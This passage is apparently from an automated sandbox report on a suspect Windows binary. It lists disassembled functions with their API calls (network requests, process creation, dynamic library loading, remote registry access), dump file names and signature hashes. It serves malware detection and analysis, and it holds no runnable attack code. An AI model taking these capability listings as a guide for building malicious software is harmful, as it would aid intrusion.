                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 6aabf96cd6ed0cac5b034cdba75be7ffa2f479ae8a5c179b10a382deb1400919
                                                                                • Instruction ID: ef4aeaa1ea5dc037b76c2a6a89fe284db0535f6c9e56131ee89791122ad818ce
                                                                                • Opcode Fuzzy Hash: 6aabf96cd6ed0cac5b034cdba75be7ffa2f479ae8a5c179b10a382deb1400919
                                                                                • Instruction Fuzzy Hash: 7C21F671A00148BFDB16ABA5D887EFFB77CDF46354B104229F121AB2E1DB784E069760
                                                                                Function 004043E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00404401
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404427
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00404457
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040449E
                                                                                  • Part of subcall function 00405052: GetLastError.KERNEL32(?,?,004043CC,00000000,00000000,00000001), ref: 00405067
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 1951874230-3916222277
                                                                                • Opcode ID: 2ad1bd393c6e87e7dabd0786251d5f26bdc2f6a48686f57c179aa7ce8f9e53dd
                                                                                • Instruction ID: e75a6d87f01d44c8f3bfa95f325176641af57182fa0b8e15740f35a53925bd16
                                                                                • Opcode Fuzzy Hash: 2ad1bd393c6e87e7dabd0786251d5f26bdc2f6a48686f57c179aa7ce8f9e53dd
                                                                                • Instruction Fuzzy Hash: CB2171B1500208BEE7119B54DC85EBF76ECEB88758F10843BF605A6280DA788D055779
                                                                                Function 004190E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003CD1BA
                                                                                  • Part of subcall function 003CD17C: GetStockObject.GDI32(00000011), ref: 003CD1CE
                                                                                  • Part of subcall function 003CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003CD1D8
                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0041915C
                                                                                • LoadLibraryW.KERNEL32(?), ref: 00419163
                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00419178
                                                                                • DestroyWindow.USER32(?), ref: 00419180
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                • String ID: SysAnimate32
                                                                                • API String ID: 4146253029-1011021900
                                                                                • Opcode ID: 3826d04767ef519a8db451ea665d7800d046cf92f27161bde73bf96c469be43a
                                                                                • Instruction ID: 2fd1f80eeeacd1faa7b6fd2de518339012ae404f1a171237549d425dd3c13e87
                                                                                • Opcode Fuzzy Hash: 3826d04767ef519a8db451ea665d7800d046cf92f27161bde73bf96c469be43a
                                                                                • Instruction Fuzzy Hash: C6218E71600206BBFF104E64DC95EFB37A9EB99364F10462AFA1492290C735DCD2A769
                                                                                Function 003F9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 003F9588
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F95B9
                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 003F95CB
                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003F9605
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: ca04ac937ec9961765d063a288b2f9a652512787b47144d9548f418dd7d9fd7b
                                                                                • Instruction ID: 5f61026122bf1554e805516db1f68f710e352c7f2d7e81a4b75e7dff3f6316e1
                                                                                • Opcode Fuzzy Hash: ca04ac937ec9961765d063a288b2f9a652512787b47144d9548f418dd7d9fd7b
                                                                                • Instruction Fuzzy Hash: D721627050020DABDB269F65DC05BAAB7F8AF56720F204A1AFEA5DB2D0D770D944CB10
                                                                                Function 003F9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 003F9653
                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F9683
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 003F9694
                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003F96CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$FilePipe
                                                                                • String ID: nul
                                                                                • API String ID: 4209266947-2873401336
                                                                                • Opcode ID: deebc19eb288dff9dc94605306edb0b5f1d9a2b6423ba5caa77d30dd477808ed
                                                                                • Instruction ID: 62670be5b4d760aaf80545ba561d79f27f4482aa78320070e1eb20b0f71353f9
                                                                                • Opcode Fuzzy Hash: deebc19eb288dff9dc94605306edb0b5f1d9a2b6423ba5caa77d30dd477808ed
                                                                                • Instruction Fuzzy Hash: E72186719002099BDB219F69DC44FAAB7ECAF55734F200A1AFEA1DB2D0D770D841CB54
                                                                                Function 003FDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 003FDB0A
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003FDB5E
                                                                                • __swprintf.LIBCMT ref: 003FDB77
                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0044DC00), ref: 003FDBB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                • String ID: %lu
                                                                                • API String ID: 3164766367-685833217
                                                                                • Opcode ID: d35116490795879ec7950a6f7d23485802df57d493c4d3d215612ae8fe020fdf
                                                                                • Instruction ID: 0b73c0ea84b4c76adb392e450423019a9d69b9ab8e52ee0a5167f87fccec1227
                                                                                • Opcode Fuzzy Hash: d35116490795879ec7950a6f7d23485802df57d493c4d3d215612ae8fe020fdf
                                                                                • Instruction Fuzzy Hash: D7219535A00108AFCB11EFA4DD85EEEBBB8EF48704B104069F609DB251DB70EE01DB61
                                                                                Function 003EC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003EC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003EC84A
                                                                                  • Part of subcall function 003EC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 003EC85D
                                                                                  • Part of subcall function 003EC82D: GetCurrentThreadId.KERNEL32 ref: 003EC864
                                                                                  • Part of subcall function 003EC82D: AttachThreadInput.USER32(00000000), ref: 003EC86B
                                                                                • GetFocus.USER32 ref: 003ECA05
                                                                                  • Part of subcall function 003EC876: GetParent.USER32(?), ref: 003EC884
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 003ECA4E
                                                                                • EnumChildWindows.USER32(?,003ECAC4), ref: 003ECA76
                                                                                • __swprintf.LIBCMT ref: 003ECA90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                • String ID: %s%d
                                                                                • API String ID: 3187004680-1110647743
                                                                                • Opcode ID: 6165a5368b774e523b0590a951db58e9bde9bfc2eefa13cdda79c8e1ca25c95d
                                                                                • Instruction ID: edd7a69cf57bbbccbe15d02f881326185ea3d1297d279b253e4652a7ae14a9df
                                                                                • Opcode Fuzzy Hash: 6165a5368b774e523b0590a951db58e9bde9bfc2eefa13cdda79c8e1ca25c95d
                                                                                • Instruction Fuzzy Hash: EE11AFB16102197BDF02BFA1DC86FED376CAB44704F00917AFE18AA182CB749946CB74
                                                                                Function 003D7A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 003D7AD8
                                                                                  • Part of subcall function 003D7CF4: __mtinitlocknum.LIBCMT ref: 003D7D06
                                                                                  • Part of subcall function 003D7CF4: EnterCriticalSection.KERNEL32(00000000,?,003D7ADD,0000000D), ref: 003D7D1F
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 003D7AE5
                                                                                • __lock.LIBCMT ref: 003D7AF9
                                                                                • ___addlocaleref.LIBCMT ref: 003D7B17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                • String ID: `C
                                                                                • API String ID: 1687444384-2712709324
                                                                                • Opcode ID: 66529b4f69e0efa96a26911f84815b74e0e4c270e954bcf13eed3ff8c344dac1
                                                                                • Instruction ID: b2051ea728711acacf499ebc2208f8c03c78691058d70234f18e2a63f4e8743d
                                                                                • Opcode Fuzzy Hash: 66529b4f69e0efa96a26911f84815b74e0e4c270e954bcf13eed3ff8c344dac1
                                                                                • Instruction Fuzzy Hash: B7015B72405B009FD722DF75E90674AB7F0AF40321F20890FE4AA9B3A0DBB4A644CB05
                                                                                Function 0041E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0041E33D
                                                                                • _memset.LIBCMT ref: 0041E34C
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00473D00,00473D44), ref: 0041E37B
                                                                                • CloseHandle.KERNEL32 ref: 0041E38D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                • String ID: D=G
                                                                                • API String ID: 3277943733-176316547
                                                                                • Opcode ID: a65f30882dcd15e2a59131df888c2a11f8e1fe62274c374c2ae0bd693b6e5134
                                                                                • Instruction ID: 37662cab8054affa8271b838a3aeb65ad47794db04c75c2f244dd1e0aff02200
                                                                                • Opcode Fuzzy Hash: a65f30882dcd15e2a59131df888c2a11f8e1fe62274c374c2ae0bd693b6e5134
                                                                                • Instruction Fuzzy Hash: B4F05EF1540314BAE2205F61BC49FBB7E5CDB05B55F008432BE0CDA2A2D3799E40A6AD
                                                                                Function 00411945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004119F3
                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00411A26
                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00411B49
                                                                                • CloseHandle.KERNEL32(?), ref: 00411BBF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                • String ID:
                                                                                • API String ID: 2364364464-0
                                                                                • Opcode ID: f7656512c667982d2bdbc464869cf5de1e00a6ff0aa00245b2702174e3f687f5
                                                                                • Instruction ID: 2b0700bd0dd4d22c50a0dd46b30c96c3333a87690169ff9182cb623a5362f672
                                                                                • Opcode Fuzzy Hash: f7656512c667982d2bdbc464869cf5de1e00a6ff0aa00245b2702174e3f687f5
                                                                                • Instruction Fuzzy Hash: BC816470600214ABDF119F64C886FAEBBE5AF04710F14845AFA15AF392D7B9ED41CF94
                                                                                Function 0041E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0041E1D5
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0041E20D
                                                                                • IsDlgButtonChecked.USER32(?,00000001), ref: 0041E248
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041E269
                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0041E281
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                • String ID:
                                                                                • API String ID: 3188977179-0
                                                                                • Opcode ID: 186062ddec78397c91a90122f962d99bf44e1940aa61008f16dabf78da035fae
                                                                                • Instruction ID: 3b88ebc99f6092cbfad135db2f4e9018d8a829a9ec3dc209ea05bbdac20e27dd
                                                                                • Opcode Fuzzy Hash: 186062ddec78397c91a90122f962d99bf44e1940aa61008f16dabf78da035fae
                                                                                • Instruction Fuzzy Hash: 2E619538A00204AFDB25CF5AC855FEB7BB9AB49300F14805AFD59973A1C779AD90CB19
                                                                                Function 003F1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 003F1CB4
                                                                                • VariantClear.OLEAUT32(00000013), ref: 003F1D26
                                                                                • VariantClear.OLEAUT32(00000000), ref: 003F1D81
                                                                                • VariantClear.OLEAUT32(?), ref: 003F1DF8
                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003F1E26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                • String ID:
                                                                                • API String ID: 4136290138-0
                                                                                • Opcode ID: 4f434ba50be8368b774902acc5f26073293848cd5620300bd3bcec4358bffbcb
                                                                                • Instruction ID: a8846cd4e6070f1ebd922dbf98d5ee03305d5aa9a769e3a19ff19ad0133057c3
                                                                                • Opcode Fuzzy Hash: 4f434ba50be8368b774902acc5f26073293848cd5620300bd3bcec4358bffbcb
                                                                                • Instruction Fuzzy Hash: C15149B5A00209EFDB14CF58D880AAAB7B8FF5C314B158569FA59DB301D330EA51CFA0
                                                                                Function 00410688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004106EE
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0041077D
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041079B
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004107E1
                                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 004107FB
                                                                                  • Part of subcall function 003CE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,003FA574,?,?,00000000,00000008), ref: 003CE675
                                                                                  • Part of subcall function 003CE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,003FA574,?,?,00000000,00000008), ref: 003CE699
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 327935632-0
                                                                                • Opcode ID: a1187f8ae1411751ea1dbdd2a832da387ad3e160fba5d10abc66a4acf9ca5250
                                                                                • Instruction ID: aabd35dbc92ec2b8f3627f712dc7a6e4899b77c74c9392d600522c27cdd21215
                                                                                • Opcode Fuzzy Hash: a1187f8ae1411751ea1dbdd2a832da387ad3e160fba5d10abc66a4acf9ca5250
                                                                                • Instruction Fuzzy Hash: 52516C75A00209DFCB01EFA8C581DEDB7B5BF49314B04806AEA15AF351DB74ED81CB94
                                                                                Function 00412E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00413C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00412BB5,?,?), ref: 00413C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00412EEF
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00412F2E
                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00412F75
                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00412FA1
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00412FAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 3740051246-0
                                                                                • Opcode ID: 30af5a85b4f6d942b000a3796f0f856d6b8cb2ee1029e8d7ad09f57684b5c87f
                                                                                • Instruction ID: be8865563ff25e652f5356b8b732c1af1023ded051898ea210d71760814b611c
                                                                                • Opcode Fuzzy Hash: 30af5a85b4f6d942b000a3796f0f856d6b8cb2ee1029e8d7ad09f57684b5c87f
                                                                                • Instruction Fuzzy Hash: 86516931208204AFD705EF64C981EAAB7F8BF88308F00482EF6959B291DB74E955DB56
                                                                                Function 0041CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
